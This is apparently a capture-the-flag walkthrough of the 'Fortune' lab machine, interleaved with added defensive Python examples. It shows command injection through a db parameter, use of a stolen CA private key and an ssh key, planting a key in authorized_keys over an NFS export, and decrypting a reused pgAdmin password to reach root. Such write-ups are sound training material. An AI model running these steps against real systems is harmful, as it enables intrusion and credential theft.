From nmap, ports 22, 80 and 443 are open.
root@kali:~# nmap -sC -sV 10.10.10.127
Starting Nmap 7.60 ( https://nmap.org ) at 2019-05-14 22:07 EEST
Nmap scan report for 10.10.10.127
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 07:ca:21:f4:e0:d2:c6:9e:a8:f7:61:df:d7:ef:b1:f4 (RSA)
| 256 30:4b:25:47:17:84:af:60:e2:80:20:9d:fd:86:88:46 (ECDSA)
|_ 256 93:56:4a:ee:87:9d:f6:5b:f9:d9:25:a6:d8:e0:08:7e (EdDSA)
80/tcp open http OpenBSD httpd
|_http-server-header: OpenBSD httpd
|_http-title: Fortune
443/tcp open ssl/https?
|_ssl-date: TLS randomness does not represent time
The db parameter is vulnerable to command injection by appending ;{command} to the value of db.
Reverse shell isn't possible from here.
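What that injection looks like from the application side, next to the fix, as an added example that is not code from the page or from the Fortune box itself. I assume the db value ends up as an argument to a fortune command (the page does not show the server code); the allowlist, pattern and function names are mine.

```python
import re
import subprocess

# Constructed allowlist of fortune database names for this example; the real
# application's set of databases is not on the page.
ALLOWED_DBS = {"fortunes", "startrek", "zippy", "riddles"}
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,32}")


def unsafe_command(db: str) -> str:
    """The vulnerable pattern: untrusted input pasted into a string that a shell
    will parse, so a ';' in the value ends the intended command and starts a
    second one. Returned as text only; nothing here executes it."""
    return f"fortune -s {db}"


def safe_argv(db: str) -> list:
    """Validate the parameter and return an argv list for subprocess.

    Two independent checks: the syntactic pattern rejects every shell
    metacharacter, and the membership test rejects names that merely look
    harmless but are not known databases.
    """
    if not SAFE_NAME.fullmatch(db):
        raise ValueError(f"db parameter has disallowed characters: {db!r}")
    if db not in ALLOWED_DBS:
        raise ValueError(f"unknown fortune database: {db!r}")
    return ["fortune", "-s", db]


def is_accepted(db: str) -> bool:
    """Convenience wrapper: does the hardened validator accept this value?"""
    try:
        safe_argv(db)
        return True
    except ValueError:
        return False


def run_fortune(db: str) -> str:
    """Run the command without a shell: argv goes straight to execve, so the
    value is always one argument whatever characters it contains."""
    result = subprocess.run(safe_argv(db), capture_output=True, text=True, timeout=5)
    return result.stdout


if __name__ == "__main__":
    print(unsafe_command("startrek;id"))   # shows why string building fails
    print(safe_argv("startrek"))           # argv list, no shell involved
```

The detection angle is the same check in reverse: request logs for the fortune endpoint where db contains ';', '|', '&' or whitespace are the probes and the successful injections.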
Two juicy files are located at /home/bob/ca/intermediate/certs/intermediate.cert.pem and /home/bob/ca/intermediate/private/intermediate.key.pem. The first file is a certificate (the public half of the website's certificate chain) and the second one is its private key. Having those files I created a PKCS#12 (p12) certificate.
root@kali:~# openssl req -newkey rsa:4096 -keyout alice_key.pem -out alice_csr.pem -nodes -days 365 -subj "/CN=Alice"
root@kali:~# openssl x509 -req -in alice_csr.pem -CA intermediate.cert.pem -CAkey intermediate.key.pem -out alice_cert.pem -set_serial 01 -days 365
root@kali:~# openssl pkcs12 -export -clcerts -in intermediate.cert.pem -inkey intermediate.key.pem -out alice.p12
At first it gives an error, but after importing alice.p12 there is some progress. Click generate and
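The root cause above is a CA private key readable by other users. The following is an added example (not from the page) of the audit a defender would run over a directory tree: it recognises PEM private key files by their header and reports any with group or other permission bits set. The tree it builds under a temporary directory mirrors the page's /home/bob/ca layout with constructed placeholder bodies, not real key material.

```python
import os
import stat
import tempfile

# PEM headers that mark private key material (PKCS#1, SEC1, PKCS#8, OpenSSH).
PRIVATE_KEY_HEADERS = (
    b"-----BEGIN RSA PRIVATE KEY-----",
    b"-----BEGIN EC PRIVATE KEY-----",
    b"-----BEGIN PRIVATE KEY-----",
    b"-----BEGIN ENCRYPTED PRIVATE KEY-----",
    b"-----BEGIN OPENSSH PRIVATE KEY-----",
)


def is_pem_private_key(path: str) -> bool:
    """Look only at the first bytes, so large or binary files cost nothing."""
    try:
        with open(path, "rb") as f:
            head = f.read(64)
    except OSError:
        return False
    return head.lstrip().startswith(PRIVATE_KEY_HEADERS)


def exposed_private_keys(root: str) -> list:
    """Return [(path, mode)] for PEM private keys with any group/other bits set.

    A CA key should be mode 0600 (or 0400) and owned by the CA operator; any
    bit in 0o077 means another local user, or an NFS client, can read or
    alter it.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)  # lstat: do not follow symlinks
            if not stat.S_ISREG(st.st_mode):
                continue
            if not is_pem_private_key(path):
                continue
            mode = stat.S_IMODE(st.st_mode)
            if mode & 0o077:
                findings.append((path, oct(mode)))
    return sorted(findings)


def demo() -> list:
    """Build a constructed tree shaped like the page's /home/bob/ca and audit it."""
    base = tempfile.mkdtemp(prefix="ca-audit-")
    certs = os.path.join(base, "intermediate", "certs")
    priv = os.path.join(base, "intermediate", "private")
    os.makedirs(certs)
    os.makedirs(priv)
    samples = {
        # constructed placeholder bodies, not real certificates or keys
        os.path.join(certs, "intermediate.cert.pem"):
            (b"-----BEGIN CERTIFICATE-----\nMIIC...\n-----END CERTIFICATE-----\n", 0o644),
        os.path.join(priv, "intermediate.key.pem"):
            (b"-----BEGIN RSA PRIVATE KEY-----\nMIIE...\n-----END RSA PRIVATE KEY-----\n", 0o644),
        os.path.join(priv, "locked.key.pem"):
            (b"-----BEGIN PRIVATE KEY-----\nMIIE...\n-----END PRIVATE KEY-----\n", 0o600),
    }
    for path, (body, mode) in samples.items():
        with open(path, "wb") as f:
            f.write(body)
        os.chmod(path, mode)
    return exposed_private_keys(base)


if __name__ == "__main__":
    for path, mode in demo():
        print(f"{mode} {path}")
```

Only the world-readable intermediate.key.pem is reported; the certificate is public by design and the 0600 key is fine. Run it against /home on a box where /home is NFS-exported and the result is exactly the list of keys every NFS client can copy.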
Using the private key to access the ssh port as nfsuser (found inside /etc/passwd):
root@kali:~# chmod 600 nfsuser.priv
root@kali:~# ssh -i nfsuser.priv nfsuser@10.10.10.127
Port 2049 is open now.
root@kali:~# nmap 10.10.10.127
Starting Nmap 7.60 ( https://nmap.org ) at 2019-05-15 00:41 EEST
Nmap scan report for 10.10.10.127
Host is up (0.11s latency).
Not shown: 992 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
443/tcp open https
1947/tcp filtered sentinelsrm
2049/tcp open nfs
6668/tcp filtered irc
8081/tcp open blackice-icecap
Nmap done: 1 IP address (1 host up) scanned in 20.79 seconds
root@kali:# showmount -e 10.10.10.127
Export list for 10.10.10.127:
/home (everyone)
Mounting /home folder
root@kali:# mkdir /tmp/home/ && mount 10.10.10.127:/home/ /tmp/home/
Having rw permissions to charlie's folder, I append my public ssh key to his authorized_keys and get ssh access as the charlie user.
root@kali:/tmp/home# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/fuxsocy/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/fuxsocy/.ssh/id_rsa.
Your public key has been saved in /home/fuxsocy/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:fW1/G5sQAc0x4l/0A/0MlkaH1X1bkLxfyHZETD7c76o root@kali
The key's randomart image is:
+---[RSA 2048]----+
| oo*=@B|
| . oo&+X|
| . = @O|
| . ..B.O|
| S . .+ooo|
| . ..o.|
| . .+|
| ..*|
| E..+ |
+----[SHA256]-----+
root@kali:# cat /home/fuxsocy/.ssh/id_rsa.pub >> /tmp/home/charlie/.ssh/authorized_keys
root@kali:# ssh -i /home/fuxsocy/.ssh/id_rsa charlie@10.10.10.127
Last login: Tue May 14 16:52:51 2019 from 10.10.16.86
OpenBSD 6.4 (GENERIC) #349: Thu Oct 11 13:25:13 MDT 2018
Welcome to OpenBSD: The proactively secure Unix-like operating system.
fortune$
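The detection-side counterpart to the step above, added here as an example (not code from the page): compute the SHA256 fingerprint of each authorized_keys entry, the same value ssh-keygen -l prints, and diff it against a baseline of fingerprints the owner is known to use. The key lines below are constructed stand-ins (the blobs are not real keys; the fingerprint math does not care), and the "root@kali" comment matches the one on the key generated in the page.

```python
import base64
import hashlib

KEY_TYPES = ("ssh-", "ecdsa-sha2-", "sk-")


def split_entry(line: str) -> tuple:
    """Return (key_type, base64_blob, comment) for one authorized_keys line.

    Entries may start with options ("from=...,no-pty ssh-rsa AAAA..."), so scan
    for the first key-type token. Options containing quoted spaces are not handled.
    """
    tokens = line.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.startswith(KEY_TYPES):
            return tok, tokens[i + 1], " ".join(tokens[i + 2:])
    raise ValueError(f"not an authorized_keys entry: {line!r}")


def ssh_fingerprint(line: str) -> str:
    """SHA256 fingerprint in ssh-keygen -l form: base64(sha256(blob)) without padding."""
    _, blob_b64, _ = split_entry(line)
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str) -> list:
    """Return [(fingerprint, comment)] for each key entry, skipping blanks and comments."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        _, _, comment = split_entry(line)
        entries.append((ssh_fingerprint(line), comment))
    return entries


def unexpected_keys(text: str, baseline: set) -> list:
    """Entries whose fingerprint is not in the approved baseline."""
    return [(fp, c) for fp, c in parse_authorized_keys(text) if fp not in baseline]


def _blob(label: bytes) -> str:
    # Constructed stand-in for a key blob; any bytes work for the fingerprint demo.
    return base64.b64encode(label).decode()


KNOWN_LINE = "ssh-ed25519 " + _blob(b"constructed: charlie workstation key") + " charlie@fortune"
INTRUDER_LINE = "ssh-rsa " + _blob(b"constructed: key appended over NFS") + " root@kali"
AUTHORIZED_KEYS = "\n".join(["# charlie's keys", KNOWN_LINE, "", INTRUDER_LINE]) + "\n"


def demo() -> list:
    baseline = {ssh_fingerprint(KNOWN_LINE)}
    return unexpected_keys(AUTHORIZED_KEYS, baseline)


if __name__ == "__main__":
    for fp, comment in demo():
        print(f"unexpected key {fp} ({comment})")
```

On a host whose /home is exported to everyone, running this from cron against every user's authorized_keys and alerting on new fingerprints catches exactly the write shown above; the longer-term fix is restricting the export and using root_squash, or not exporting home directories at all.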
A file called mbox contains
fortune$ cat mbox
From bob@fortune.htb Sat Nov 3 11:18:51 2018
Return-Path: <bob@fortune.htb>
Delivered-To: charlie@fortune.htb
Received: from localhost (fortune.htb [local])
by fortune.htb (OpenSMTPD) with ESMTPA id bf12aa53
for <charlie@fortune.htb>;
Sat, 3 Nov 2018 11:18:51 -0400 (EDT)
From: <bob@fortune.htb>
Date: Sat, 3 Nov 2018 11:18:51 -0400 (EDT)
To: charlie@fortune.htb
Subject: pgadmin4
Message-ID: <196699abe1fed384@fortune.htb>
Status: RO
Hi Charlie,
Thanks for setting-up pgadmin4 for me. Seems to work great so far.
BTW: I set the dba password to the same as root. I hope you don't mind.
Cheers,
Bob
fortune$
On /var/appsrv/pgadmin4/ is a file pgadmin4.db which holds an encrypted string {utUU0jkamCZDmqFLOrAuPjFxL0zp8zWzISe5MF0GY/l8Silrmu3caqrtjaVjLQlvFFEgESGz} and the key it was encrypted with {$pbkdf2-sha512$25000$z9nbm1Oq9Z5TytkbQ8h5Dw$Vtx9YWQsgwdXpBnsa8BtO5kLOdQGflIZOQysAy7JdTVcRbv/6csQHAJCAIJT9rLFBawClFyMKnqKNL5t3Le9vg}.
Adding
print decrypt("utUU0jkamCZDmqFLOrAuPjFxL0zp8zWzISe5MF0GY/l8Silrmu3caqrtjaVjLQlvFFEgESGz","$pbkdf2-sha512$25000$z9nbm1Oq9Z5TytkbQ8h5Dw$Vtx9YWQsgwdXpBnsa8BtO5kLOdQGflIZOQysAy7JdTVcRbv/6csQHAJCAIJT9rLFBawClFyMKnqKNL5t3Le9vg")
at the end of the file crypto.py, located at /usr/local/pgadmin4/pgadmin4-3.4/web/pgadmin/utils/crypto.py, we can decrypt the encrypted string.
root@kali:# python crypto.py
R3us3-0f-a-P4ssw0rdl1k3th1s?_B4D.ID3A!
None
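What those two strings are, as an added example that is not code from the page or from pgAdmin: the second string is a passlib-style pbkdf2-sha512 hash of the pgAdmin login password, and the decrypt call above uses that very hash as the key for the saved server password. So the saved dba password is protected only by who can read pgadmin4.db, and with the dba password reused for root, a readable database file is a root compromise. The code parses the hash format with the standard library and verifies a candidate password against it (useful for checking an account against a list of known-weak or already-leaked passwords); the function names and the constructed example password are mine.

```python
import base64
import hashlib
import hmac
import os

# Hash string exactly as it appears in the page's pgadmin4.db.
PAGE_HASH = ("$pbkdf2-sha512$25000$z9nbm1Oq9Z5TytkbQ8h5Dw$"
             "Vtx9YWQsgwdXpBnsa8BtO5kLOdQGflIZOQysAy7JdTVcRbv/6csQHAJCAIJT9rLFBawClFyMKnqKNL5t3Le9vg")


def ab64_decode(s: str) -> bytes:
    """passlib's adapted base64: '.' stands in for '+' and padding is omitted."""
    s = s.replace(".", "+")
    return base64.b64decode(s + "=" * (-len(s) % 4))


def ab64_encode(b: bytes) -> str:
    return base64.b64encode(b).decode().replace("+", ".").rstrip("=")


def parse_pbkdf2_sha512(h: str) -> tuple:
    """Split '$pbkdf2-sha512$rounds$salt$checksum' into (rounds, salt, checksum)."""
    parts = h.split("$")
    if len(parts) != 5 or parts[0] != "" or parts[1] != "pbkdf2-sha512":
        raise ValueError("not a pbkdf2-sha512 hash string")
    return int(parts[2]), ab64_decode(parts[3]), ab64_decode(parts[4])


def make_hash(password: str, rounds: int = 25000, salt: bytes = None) -> str:
    """Produce a hash in the same format (16-byte random salt unless one is given)."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, rounds)
    return f"$pbkdf2-sha512${rounds}${ab64_encode(salt)}${ab64_encode(dk)}"


def verify(password: str, h: str) -> bool:
    """Constant-time comparison of the derived key against the stored checksum."""
    rounds, salt, checksum = parse_pbkdf2_sha512(h)
    dk = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, rounds, dklen=len(checksum))
    return hmac.compare_digest(dk, checksum)


def page_hash_params() -> tuple:
    """(rounds, salt length, checksum length) of the hash found on the box."""
    rounds, salt, checksum = parse_pbkdf2_sha512(PAGE_HASH)
    return rounds, len(salt), len(checksum)


def demo() -> tuple:
    """Round-trip with a constructed password and fixed salt: (correct, wrong)."""
    h = make_hash("constructed-example-password", salt=b"\x01" * 16)
    return verify("constructed-example-password", h), verify("constructed-example-passw0rd", h)


if __name__ == "__main__":
    print(page_hash_params())  # 25000 rounds, 16-byte salt, 64-byte checksum
    print(demo())
```

The mitigations follow directly: keep pgadmin4.db mode 0600 and owned by the service account, store it outside any exported or shared path, and never let a database role share a password with a system account.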
fortune$ su -
Password:
fortune#
fortune# cat /home/charlie/user.txt
ada0a[redacted]
fortune# cat /root/root.txt
335af[redacted]
fortune#